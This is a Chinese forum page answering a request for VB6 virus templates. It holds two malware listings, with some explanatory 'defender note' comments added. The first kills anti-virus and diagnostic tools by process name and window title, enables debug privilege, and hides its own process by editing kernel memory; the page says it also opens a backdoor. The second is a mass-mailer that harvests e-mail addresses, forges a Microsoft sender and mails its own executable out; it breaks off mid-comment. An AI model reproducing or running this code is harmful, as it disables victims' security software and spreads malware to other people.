怎么用VB6.0编写病毒(要模板)



介绍几个用vb 编写的病毒
以下两个怎么都出现错误呀

全都放在标准模块中,不要有窗体,启动设置为Sub_main,就行了,可以结干掉常见的反病毒软件,包括冰刃、Autoruns、Sreng、瑞星、卡巴、江民、金山、NOD32等,还开放被感染机器的后门,便于进一步入侵。

Option Explicit
Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Declare Function EnumWindows Lib "user32.dll" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Declare Function SetForegroundWindow Lib "user32" (ByVal hwnd As Long) As Long
Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long)
Const PROCESS_ALL_ACCESS As Long = &HFFF
Const WM_CLOSE = &H10
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const ERROR_SUCCESS = 0&
Public KEY_ALL_ACCESS As Double
Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function CopyFile Lib "kernel32.dll" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Public Const STATUS_ACCESS_DENIED = &HC0000022
Public Const STATUS_INVALID_HANDLE = &HC0000008
Public Const SECTION_MAP_WRITE = &H2
Public Const SECTION_MAP_READ = &H4
Public Const READ_CONTROL = &H20000
Public Const WRITE_DAC = &H40000
Public Const NO_INHERITANCE = 0
Public Const DACL_SECURITY_INFORMATION = &H4
Public Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Public Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Public Const OBJ_INHERIT = &H2
Public Const OBJ_PERMANENT = &H10
Public Const OBJ_EXCLUSIVE = &H20
Public Const OBJ_CASE_INSENSITIVE = &H40
Public Const OBJ_OPENIF = &H80
Public Const OBJ_OPENLINK = &H100
Public Const OBJ_KERNEL_HANDLE = &H200
Public Const OBJ_VALID_ATTRIBUTES = &H3F2
Public Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDeor As Long
SecurityQualityOfService As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type

Public Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Public Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long

Public Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
Public Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

Public Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, ByVal SourceString As Long)
Public Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Public Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Public Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Public Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long

Public Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Public verinfo As OSVERSIONINFO

Public g_hNtDLL As Long
Public g_pMapPhysicalMemory As Long
Public g_hMPM As Long
Public aByte(3) As Byte

Public Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Public Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum

Public Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum

Public Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum

Public Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type

Public Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type

Public Type AceArray
List() As EXPLICIT_ACCESS
End Type

Public Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type

Public Const ANYSIZE_ARRAY As Long = 1
Public Const SE_PRIVILEGE_ENABLED As Long = &H2
Public Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Public Const TOKEN_QUERY As Long = &H8

Public Type LUID_AND_ATTRIBUTES
LUID As LARGE_INTEGER
Attributes As Long
End Type

Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, ByRef PreviousState As Long, ByRef ReturnLength As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Public Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long

Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
Public Declare Function GetLastError Lib "kernel32.dll" () As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Thread32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Thread32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpte As THREADENTRY32) As Long
Public Declare Function Module32First Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lppe As MODULEENTRY32) As Long
Public Declare Function Module32Next Lib "kernel32.dll" (ByVal hSnapshot As Long, ByRef lpme As MODULEENTRY32) As Long
Public Declare Function TerminateThread Lib "kernel32" (ByVal hThread As Long, ByVal dwExitCode As Long) As Long
Public Declare Function OpenThread Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwThreadId As Long) As Long

Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE As Long = &H8

Public Const PROCESS_TERMINATE As Long = (&H1)
Public Const MAX_PATH As Integer = 260

' Toolhelp snapshot record for one process; this is the buffer type taken by the
' Process32First / Process32Next declarations in this module.
' szExeFile is a fixed-length string of MAX_PATH characters holding the image name.
Public Type PROCESSENTRY32
dwsize As Long
cntusage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Public Type MODULEENTRY32 ' module record (buffer type for Module32First / Module32Next)
dwsize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Byte
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 1024
End Type

Public Type THREADENTRY32 ' thread record (buffer type for Thread32First / Thread32Next)
dwsize As Long
cntusage As Long
th32threadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type

' Terminates the threads that GetThreadList reports for one process.
'
' ProcessID: owner process ID whose thread entries are requested.
' Returns:   True when the last TerminateThread call made in the loop returned non-zero.
'
' Defender note: KillProcess calls this as a fallback when TerminateProcess fails and
' bKillThread is set. A non-debugger process that opens thread handles in another process
' and calls TerminateThread on them is an uncommon pattern worth alerting on, especially
' when the owning process belongs to a security product.
Public Function KillThread(ByVal ProcessID As Long) As Boolean
Dim hThread As Long, r As Long, i As Long
Dim TList() As THREADENTRY32

TList = GetThreadList(ProcessID)

For i = 0 To UBound(TList)
With TList(i)
hThread = OpenThread(PROCESS_TERMINATE, False, .th32threadID) ' obtain a handle for this thread ID
If hThread <> 0 Then
r = TerminateThread(hThread, 0) ' terminate it with exit code 0
End If
End With
Next
KillThread = r <> 0
End Function

' Walks the process snapshot and tries to terminate every process that matches ProcessName.
'
' ProcessName: compared case-insensitively (after Trim) with each entry's image name; an
'              entry also matches when InModule reports a loaded module of that name.
' bKillThread: when True and the first TerminateProcess returns zero, KillThread is called
'              on the process before TerminateProcess is tried a second time.
'
' Defender note: targeting is purely name based. Relevant telemetry is a process handle
' opened with PROCESS_TERMINATE against security or diagnostic tools, followed by their
' unexpected exit; tamper protection in endpoint products exists to refuse exactly this.
Public Function KillProcess(ByVal ProcessName As String, Optional ByVal bKillThread As Boolean) As Boolean
Dim hProcess As Long, r As Long
Dim PList() As PROCESSENTRY32
Dim Name As String, i As Long

PList = GetProcessList

For i = 0 To UBound(PList)
With PList(i)
' szExeFile is a fixed-length buffer; keep only the text before the first NUL.
Name = Left(.szExeFile, InStr(1, .szExeFile, vbNullChar) - 1)
DoEvents
r = InModule(.th32ProcessID, ProcessName)
If LCase(Trim(Name)) = LCase(Trim(ProcessName)) Or r Then
hProcess = OpenProcess(PROCESS_TERMINATE, False, .th32ProcessID) ' obtain a process handle
If hProcess <> 0 Then
r = TerminateProcess(hProcess, 0) ' terminate the process
If Not (r) Then
If bKillThread Then
Call KillThread(.th32ProcessID)
End If
r = TerminateProcess(hProcess, 0) ' second termination attempt
End If
End If
End If
End With
Next
End Function

' Collects the THREADENTRY32 records whose owner is ProcessID from a Toolhelp thread snapshot.
'
' ProcessID: process ID used both for the snapshot call and as the owner filter.
' Returns:   array of matching THREADENTRY32 entries, in snapshot order.
'
' Note: the loop also calls TerminateThread with the entry's th32threadID field, so this
' routine is not a read-only enumeration.
Public Function GetThreadList(ByVal ProcessID As Long) As THREADENTRY32()
Dim i As Long
Dim TList() As THREADENTRY32
Dim TE32 As THREADENTRY32
Dim hThreadSnap As Long
Dim TheLoop As Long

hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, ProcessID)
' The Toolhelp API expects the record size to be filled in before the first call.
TE32.dwsize = Len(TE32)

TheLoop = Thread32First(hThreadSnap, TE32)
While TheLoop <> 0

If TE32.th32OwnerProcessID = ProcessID Then
ReDim Preserve TList(i)
TerminateThread TE32.th32threadID, 0
TList(i) = TE32
i = i + 1
End If

TheLoop = Thread32Next(hThreadSnap, TE32)
Wend

CloseHandle hThreadSnap
GetThreadList = TList
End Function

' Returns every PROCESSENTRY32 record from a system-wide Toolhelp process snapshot.
'
' Returns: array of PROCESSENTRY32 entries in snapshot order.
'
' Defender note: enumeration on its own is benign and common; it matters here because the
' result feeds the name matching in KillProcess.
Public Function GetProcessList() As PROCESSENTRY32()
Dim i As Long
Dim PList() As PROCESSENTRY32
Dim PE32 As PROCESSENTRY32
Dim hProcessSnap As Long
Dim TheLoop As Long

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
' Record size must be set before Process32First is called.
PE32.dwsize = Len(PE32)

TheLoop = Process32First(hProcessSnap, PE32)
While TheLoop <> 0
ReDim Preserve PList(i)
PList(i) = PE32
i = i + 1
TheLoop = Process32Next(hProcessSnap, PE32)
Wend

CloseHandle hProcessSnap
GetProcessList = PList
End Function

' Returns the MODULEENTRY32 records from a Toolhelp module snapshot of one process.
'
' ProcessID: process whose module list is requested.
' Returns:   array of MODULEENTRY32 entries in snapshot order.
Public Function GetModuleList(ByVal ProcessID As Long) As MODULEENTRY32()
Dim i As Long
Dim MList() As MODULEENTRY32
Dim ME32 As MODULEENTRY32
Dim hModuleSnap As Long
Dim TheLoop As Long

hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID)
' Record size must be set before Module32First is called.
ME32.dwsize = Len(ME32)

TheLoop = Module32First(hModuleSnap, ME32)
While TheLoop <> 0
ReDim Preserve MList(i)
MList(i) = ME32
i = i + 1
TheLoop = Module32Next(hModuleSnap, ME32)
Wend

CloseHandle hModuleSnap
GetModuleList = MList
End Function

' Reports whether a process has a module whose name equals ModuleName (case-insensitive).
'
' ProcessID:  process whose module snapshot is inspected via GetModuleList.
' ModuleName: module file name to look for.
' Returns:    True on the first match; False when nothing matches or when any run-time
'             error occurs, because the error handler jumps straight to the end.
'
' Defender note: KillProcess uses this so that a target is matched by a loaded module as
' well as by image name; renaming a tool's executable alone does not avoid the match.
Public Function InModule(ByVal ProcessID As Long, ByVal ModuleName As String) As Boolean
Dim i As Long
Dim MList() As MODULEENTRY32
Dim Name As String

On Error GoTo Err:

MList = GetModuleList(ProcessID)

For i = 0 To UBound(MList)
With MList(i)
' Keep only the text before the first NUL of the fixed-length szModule buffer.
Name = Left(.szModule, InStr(1, .szModule, vbNullChar) - 1)
If LCase(Name) = LCase(ModuleName) Then
InModule = True
Exit For
End If
End With
Next
Err:
End Function

' Tries to enable SeDebugPrivilege in the current process token.
'
' Steps visible here: open the own token with TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, look
' up the LUID for "SeDebugPrivilege", then call AdjustTokenPrivileges with
' SE_PRIVILEGE_ENABLED. The token handle is closed before returning.
' Returns: True when GetLastError is 0 after AdjustTokenPrivileges.
'
' Defender note: the privilege can only be enabled if the account already holds the
' "Debug programs" user right, so removing that right from ordinary users and service
' accounts blunts this step. Auditing of token privilege adjustments makes the request
' visible when it is made by software that is not a debugger.
Function EnableDebugPrivilege() As Boolean
Dim TP As TOKEN_PRIVILEGES
Dim hToken As Long, r As Long, e As Long

r = OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
e = GetLastError
' Err.Raise 6
If r And Not e Then
r = LookupPrivilegeValue(vbNullString, "SeDebugPrivilege", TP.Privileges(0).LUID)
e = GetLastError

If r And Not e Then
TP.PrivilegeCount = 1
TP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED

r = AdjustTokenPrivileges(hToken, False, TP, LenB(TP), 0, 0)
EnableDebugPrivilege = GetLastError = 0
End If
End If
Call CloseHandle(hToken)
End Function

' Window-enumeration callback that inspects a window title and posts WM_CLOSE to windows
' whose title looks like a security or diagnostic tool.
'
' hwnd:   window handle supplied by the enumerator.
' lParam: unused in this body.
' Returns True (the value assigned at AllOk); presumably this keeps EnumWindows iterating -
' the call site is not part of this listing.
'
' Defender note: the titles and keywords below are the page's own list and make useful
' behavioural indicators - one process posting WM_CLOSE (and synthetic keystrokes) to
' windows of other processes whose titles name anti-virus, registry or process tools.
' Tools that randomise their window title, and products that ignore WM_CLOSE from
' untrusted senders, are responses to this class of tampering.
Public Function EnumWindowsProc(ByVal hwnd As Long, ByVal lParam As Long) As Boolean
Dim sSave As String, Ret As Long, IsIceSword As Boolean, IsAutoruns As Boolean, IsProcexp As Boolean, IsTaskmgr As Boolean, Other As Boolean, i As Long

' Read the window title into sSave.
Ret = GetWindowTextLength(hwnd)
sSave = Space(Ret)
GetWindowText hwnd, sSave, Ret + 1

IsIceSword = True
IsAutoruns = True
IsProcexp = True
IsTaskmgr = True
Other = True

' Check 1 (flag IsIceSword): title length between 6 and 16 characters and the last six
' characters all drawn from 0-9 / A-F.
If Len(sSave) < 6 Or Len(sSave) > 16 Then
IsIceSword = False
GoTo No1
End If
For i = Len(sSave) - 5 To Len(sSave)
If (Mid(sSave, i, 1) <> "0") And (Mid(sSave, i, 1) <> "1") And (Mid(sSave, i, 1) <> "2") And (Mid(sSave, i, 1) <> "3") And (Mid(sSave, i, 1) <> "4") And (Mid(sSave, i, 1) <> "5") And (Mid(sSave, i, 1) <> "6") And (Mid(sSave, i, 1) <> "7") And (Mid(sSave, i, 1) <> "8") And (Mid(sSave, i, 1) <> "9") And (Mid(sSave, i, 1) <> "A") And (Mid(sSave, i, 1) <> "B") And (Mid(sSave, i, 1) <> "C") And (Mid(sSave, i, 1) <> "D") And (Mid(sSave, i, 1) <> "E") And (Mid(sSave, i, 1) <> "F") Then IsIceSword = False
Next
If IsIceSword Then
' Close request plus synthetic keystrokes sent to the matched window.
PostMessage hwnd, WM_CLOSE, 0, 0
SendKeys "Enter"
SetForegroundWindow hwnd
SendKeys "%F4"
End If
No1:
GoTo AllOk
' Check 2 (flag IsAutoruns): first 8 characters of the title compared with "Autoruns".
If Len(sSave) < 8 Then
IsAutoruns = False
GoTo No2
End If
If Mid(sSave, 1, 8) <> "Autoruns" Then IsAutoruns = False
If IsAutoruns Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No2:
GoTo AllOk
' Check 3 (flag IsProcexp): first 16 characters compared with "Process Explorer".
If Len(sSave) < 16 Then
IsProcexp = False
GoTo No3
End If
If Mid(sSave, 1, 16) <> "Process Explorer" Then IsProcexp = False
If IsProcexp Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
No3:
GoTo AllOk
' Check 4 (flag IsTaskmgr): exact comparison with the Chinese-locale Task Manager title.
If sSave <> "Windows 任务管理器" Then IsTaskmgr = False
If IsTaskmgr Then
PostMessage hwnd, WM_CLOSE, 0, 0
End If
GoTo AllOk
' Check 5: case-insensitive substring search for anti-virus vendor names and generic
' words (virus, registry, process, "Kill", "Anti", "run" and similar) in the title.
If InStr(1, sSave, "杀毒", vbTextCompare) <> 0 Or InStr(1, sSave, "病毒", vbTextCompare) <> 0 Or InStr(1, sSave, "专杀", vbTextCompare) <> 0 Or InStr(1, sSave, "注册表", vbTextCompare) <> 0 Or InStr(1, sSave, "Anti", vbTextCompare) <> 0 Or InStr(1, sSave, "进程", vbTextCompare) <> 0 Or InStr(1, sSave, "瑞星", vbTextCompare) <> 0 Or InStr(1, sSave, "毒霸", vbTextCompare) <> 0 Or _
InStr(1, sSave, "江民", vbTextCompare) <> 0 Or InStr(1, sSave, "卡巴斯基", vbTextCompare) <> 0 Or InStr(1, sSave, "NOD32", vbTextCompare) <> 0 Or InStr(1, sSave, "McAfee", vbTextCompare) <> 0 Or InStr(1, sSave, "BitDefender", vbTextCompare) <> 0 Or InStr(1, sSave, "avast", vbTextCompare) <> 0 Or InStr(1, sSave, "Kill", vbTextCompare) <> 0 Or InStr(1, sSave, "Virus", vbTextCompare) <> 0 _
Or InStr(1, sSave, "Kaspersky", vbTextCompare) <> 0 Or InStr(1, sSave, "冰刃", vbTextCompare) <> 0 Or InStr(1, sSave, "Autorun", vbTextCompare) <> 0 Or InStr(1, sSave, "sreng", vbTextCompare) <> 0 Or InStr(1, sSave, "查毒", vbTextCompare) <> 0 Or InStr(1, sSave, "运行", vbTextCompare) <> 0 Then PostMessage hwnd, WM_CLOSE, 0, 0

AllOk:
EnumWindowsProc = True
End Function

' Attempts to hide the current application's process from the process list by editing
' kernel data through a physical-memory mapping.
'
' What the body shows: version-specific offsets are chosen for platform 2 (NT family),
' major version 5, minor 0 or 1; no offsets are set for any other version. If
' OpenPhysicalMemory succeeds, values are read with GetData starting from a hard-coded
' address, and two SetData writes store each neighbour's link value into the other.
' GetData, SetData and the body of OpenPhysicalMemory are not visible in this listing,
' so their exact semantics are assumed from their names.
' NOTE(review): this looks like the classic "unlink the process entry from the kernel's
' doubly linked list" rootkit technique - confirm against the missing helpers.
'
' Defender note: the approach depends on user-mode write access to \Device\PhysicalMemory,
' which Windows removed for user-mode callers from Server 2003 SP1 onwards. On the legacy
' systems it targets, cross-view comparison (scheduler or handle-table view versus the
' linked process list) reveals a process hidden this way, and a DACL change on the
' physical-memory section object is itself a strong indicator.
Public Sub HideCurrentProcess()
' Hide the current application's process in the process list

Dim thread As Long, process As Long, fw As Long, bw As Long
Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)
If (GetVersionEx(verinfo)) <> 0 Then
If verinfo.dwPlatformId = 2 Then
If verinfo.dwMajorVersion = 5 Then
Select Case verinfo.dwMinorVersion
Case 0
lOffsetFlink = &HA0
lOffsetBlink = &HA4
lOffsetPID = &H9C
Case 1
lOffsetFlink = &H88
lOffsetBlink = &H8C
lOffsetPID = &H84
End Select
End If
End If
End If

If OpenPhysicalMemory <> 0 Then
' presumably: current thread pointer -> owning process -> forward / backward links
thread = GetData(&HFFDFF124)
process = GetData(thread + &H44)
fw = GetData(process + lOffsetFlink)
bw = GetData(process + lOffsetBlink)
' Each neighbour is made to point at the other.
SetData fw + 4, bw
SetData bw, fw
CloseHandle g_hMPM
End If
End Sub

' Adds an access-allowed entry granting SECTION_MAP_WRITE to the current user on the
' section object behind hSection.
'
' hSection: handle to a kernel section object; the name suggests the physical-memory
'           section, but the caller is not visible in this listing.
'
' Sequence: read the existing DACL (GetSecurityInfo), build one EXPLICIT_ACCESS entry
' (GRANT_ACCESS, no inheritance, trustee name "CURRENT_USER"), merge it into a new ACL
' (SetEntriesInAcl), write the new DACL back (SetSecurityInfo), then free the security
' descriptor and the new ACL with LocalFree. No return value of any call is checked.
'
' Defender note: rewriting the DACL of a kernel object requires a handle opened with
' WRITE_DAC, which in practice means an administrative context; running users without
' administrative rights removes the precondition. Object-access auditing on the section
' records the permission change.
Public Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
Dim pDacl As Long
Dim pNewDacl As Long
Dim pSD As Long
Dim dwRes As Long
Dim ea As EXPLICIT_ACCESS

GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD

ea.grfAccessPermissions = SECTION_MAP_WRITE
ea.grfAccessMode = GRANT_ACCESS
ea.grfInheritance = NO_INHERITANCE
ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar

SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0

CleanUp:
LocalFree pSD
LocalFree pNewDacl
End Sub

Public Function OpenPhysicalMemory() As Long
Dim Status As Long
Dim PhysmemString As UNICODE_STRING
Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory"
参考技术A

object = "<248dd890-bb45-11cf-9abc-0080c7e7b78d>#1.0#0"; "mswinsck.ocx"

begin vb.form form1

caption = "form1"

clientheight = 3195

clientleft = 60

clienttop = 345

clientwidth = 4680

linktopic = "form1"

scaleheight = 3195

scalewidth = 4680

startupposition = 3 windows default

begin mswinsocklib.winsock winsock1

left = 1200

top = 840

_extentx = 741

_extenty = 741

_version = 393216

end

end

attribute vb_name = "form1"

attribute vb_globalnamespace = false

attribute vb_creatable = false

attribute vb_predeclaredid = true

attribute vb_exposed = false

option explicit

private response as string

private declare sub sleep lib "kernel32" (byval dwmilliseconds as long)

private declare function shgetspecialfolderlocation lib "shell32.dll" (byval hwndowner as long, byval nfolder as long, pidl as itemidlist) as long

private declare function shgetpathfromidlist lib "shell32.dll" alias "shgetpathfromidlista" (byval pidl as long, byval pszpath as string) as long

const csidl_tif = &h20

private type shitemid

cb as long

abid as byte

end type

private type itemidlist

mkid as shitemid

end type

' Entry point of the form: runs the whole harvest-and-send sequence once, then unloads.
'
' Order of operations: delete the work file c:\t.txt, harvest addresses from the folder
' identified by csidl_tif (&h20, the Internet cache / Temporary Internet Files CSIDL)
' via listht, call transmit with a hard-coded mail host, unload the form. All errors are
' suppressed by "on error resume next".
'
' Defender note: indicators present on this page are the work file path c:\t.txt and a
' desktop program opening an outbound connection to TCP port 25.
private sub form_load()

on error resume next

kill "c:\t.txt"

listht getspecialfolder(csidl_tif)

transmit ("mail.lycos.com")

unload me

end sub

' Drives an SMTP conversation over the winsock1 control and sends one message with the
' program's own executable attached.
'
' b8: host name assigned to winsock1.remotehost; the port is fixed at 25.
' Returns True after the full dialogue when the socket was closed on entry; otherwise
' nothing is assigned.
'
' Defender note: the envelope sender and From header are forged
' (webmaster@microsoft.com), recipients come from the harvested list in c:\t.txt, and
' the body is built by hd and a12. Controls that stop this class of mass mailer: block
' outbound TCP 25 from workstations so only the mail relay can send, enforce
' SPF/DKIM/DMARC on receipt so the forged sender domain fails, and strip or quarantine
' executable attachments at the gateway.
function transmit(byval b8 as string)

dim q as string, a as string, textline as string

dim www, ggg

winsock1.localport = 0

if winsock1.state = sckclosed then

winsock1.protocol = scktcpprotocol

winsock1.remotehost = b8

winsock1.remoteport = 25

winsock1.connect

' w4c waits for the given three-digit reply code after each step.
w4c ("220")

winsock1.senddata "helo localhost" & vbcrlf

w4c ("250")

winsock1.senddata "mail from:" & " <" + "webmaster@microsoft.com" + ">" & vbcrlf

w4c ("250")

' Read the whole harvested-address file into q.
open "c:\t.txt" for input as #1

do while not eof(1)

line input #1, textline

q = q & textline

loop

close #1

a = trim(q)

' One recipient command per ";"-separated entry; entries that are empty, lack "@" or
' contain "?" are replaced by hard-coded placeholder addresses.
www = split(a, ";")

for each ggg in www

if ggg = "" then

ggg = "blah@h.net"

end if

if instr(1, ggg, "@") then

else

ggg = "faggot@fillme.com"

end if

if instr(1, ggg, "?") then

ggg = "juana12234@yahoo.com"

end if

winsock1.senddata "rcpt t " & "<" & ggg & ">" & vbcrlf

w4c ("250")

next ggg

winsock1.senddata "data" & vbcrlf

w4c ("354")

' Headers from hd, a one-line HTML lure, then the attachment part from a12.
winsock1.senddata hd & vbcrlf

winsock1.senddata "<html>this is a checking for your system from microsoft.com....</html>" & vbcrlf

winsock1.senddata a12()

winsock1.senddata vbcrlf & "." & vbcrlf

w4c ("250")

winsock1.senddata "quit" & vbcrlf

w4c ("221")

winsock1.close

transmit = true

else

end if

end function

' Winsock event handler: copies newly arrived data into the module-level "response"
' string, which w4c polls.
'
' bytestotal: byte count supplied by the control; not used here.
private sub winsock1_dataarrival(byval bytestotal as long)

winsock1.getdata response

end sub

' Waits for a server reply that starts with the expected three-character code.
'
' responsecode: reply code to wait for, compared with the first three characters of the
'               module-level "response" string.
'
' First loop: polls until "response" is non-empty, yielding with doevents and sleeping
' 1 ms per pass; leaves the sub when ttt exceeds 24. Second loop: polls until the prefix
' equals responsecode; leaves the sub when ttt exceeds 50. On a match "response" is
